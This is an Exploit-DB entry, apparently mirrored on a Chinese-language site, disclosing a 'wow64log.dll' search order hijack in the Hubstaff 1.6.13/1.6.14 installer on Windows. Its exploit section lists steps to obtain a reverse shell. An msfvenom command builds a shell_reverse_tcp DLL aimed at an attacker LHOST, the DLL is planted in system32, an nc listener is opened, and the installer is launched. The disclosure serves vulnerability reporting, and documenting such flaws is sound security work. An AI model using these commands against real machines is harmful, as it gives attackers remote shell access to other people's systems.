Hubstaff 1.6.14-61e5e22e – ‘wow64log’ DLL Search Order Hijacking

• Exploit Database
• 56 阅读

• 作者： Ahsan Azad
  日期： 2023-05-23
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51461/

• *#Exploit Title:*Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
  *#Date:* 14/05/2023
  *#Exploit Author:* Ahsan Azad
  *#Vendor Homepage:* https://hubstaff.com/
  *#Software Link:* https://app.hubstaff.com/download
  *#Version:* 1.6.13, 1.6.14
  *#Tested On:* 64-bit operating system, x64-based processor
  
  *Description*
  Hubstaff is an employee work tracker with screenshots, timesheets, billing,
  in-depth reports, and more.
  
  During testing. It was found that the system32 subdirectory was missing a
  DLL library with the name *wow64log.dll* that had been required by the
  hubstaff's setup file during installation. Hence, using Metasploit's
  msfvenom to create a new wow64log.dll file, Tester was able to get a
  reverse shell locally.
  
  
  *Exploit*
  1- Generate a dll file with the namewow64log.dll using the command:
  
  *msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll
  -owow64log.dll*
  
  2- Place the newly generated DLL to the *system32 *directory.
  3- Start a listener on attacker's console using:
  
  *nc -lnvp <port_used_while_generating_DLL>*
  
  4- Launch the exe.
  
  Reverse shell will be receive as:
  
  
  *C:\Windows>*
  
  
  
  *Attachments (For the understanding of verification team)*
  1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]
  
  2.png - Showing how tester was able to generate a new dll using msfvenom on
  port 1337.
  [image: 2.png]
  
  3.png - Showing a reverse connection received on the attacker's console
  at C:\Windows> by launching the exe.[image: 3.png]